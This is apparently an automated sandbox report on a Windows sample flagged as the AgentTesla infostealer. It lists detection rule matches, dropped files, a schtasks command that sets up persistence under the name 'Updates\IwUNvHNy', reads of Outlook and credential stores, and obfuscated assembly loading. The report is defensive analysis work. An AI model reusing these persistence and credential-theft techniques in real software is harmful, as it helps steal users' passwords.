                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.31ea1d8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_0177C1B40_2_0177C1B4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_0177E6700_2_0177E670
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_0177E6800_2_0177E680
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_0764A7580_2_0764A758
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_00F6FC1810_2_00F6FC18
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_00F66D4010_2_00F66D40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_05C9C69010_2_05C9C690
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_05C9D3F010_2_05C9D3F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_05C9004010_2_05C90040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_05C9093010_2_05C90930
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_05C92A4010_2_05C92A40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695EED010_2_0695EED0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695AEE810_2_0695AEE8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695E60810_2_0695E608
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06958D3810_2_06958D38
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695D62010_2_0695D620
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695E4B810_2_0695E4B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695A4D110_2_0695A4D1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695358210_2_06953582
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_069535CD10_2_069535CD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_069525F810_2_069525F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695393D10_2_0695393D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06A1363010_2_06A13630
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06A10DF810_2_06A10DF8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06A15A4010_2_06A15A40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06A1893610_2_06A18936
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.321918761.0000000004396000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImbSRib.exe> vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000000.247679253.0000000000CF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImbSRib.exe> vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.336301911.0000000007900000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.336921010.0000000007B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000000.306091299.0000000000438000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.515826219.00000000009C8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeBinary or memory string: OriginalFilenameImbSRib.exe> vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: IwUNvHNy.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe {path}
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe {path}
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmpJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe {path}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile created: C:\Users\user\AppData\Roaming\IwUNvHNy.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2885.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/5@8/3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.533880497.0000000002DA3000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.533836133.00000000033A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:644:120:WilError_01
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeMutant created: \Sessions\1\BaseNamedObjects\wGWyZQWLyISRnwWQTXN
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: ImbSRib.pdb source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr
                Source: Binary string: ImbSRib.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr

                Data Obfuscation

                barindex
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, frmMain.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: IwUNvHNy.exe.0.dr, frmMain.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.cf0000.0.unpack, frmMain.cs.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, frmMain.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: IwUNvHNy.exe.0.dr, frmMain.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: 0.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.cf0000.0.unpack, frmMain.cs.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_0177D469 pushfd ; ret 0_2_0177D475
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_07645D28 push esp; retf 0_2_07645D29
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_07645DCB pushfd ; retf 0_2_07645DD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 0_2_07644B70 push eax; ret 0_2_07644B71
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06952A47 push edi; retn 0000h10_2_06952A49
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695BA41 push edi; iretd 10_2_0695BA46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06953582 push es; retf 10_2_0695393C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_069535CD push es; retf 10_2_0695393C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_0695393D push es; retf 10_2_06953A20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06A15A40 push es; retf A165h10_2_06A16C90
                Source: initial sampleStatic PE information: section name: .text entropy: 7.533959618381255
                Source: initial sampleStatic PE information: section name: .text entropy: 7.533959618381255
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeFile created: C:\Users\user\AppData\Roaming\IwUNvHNy.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
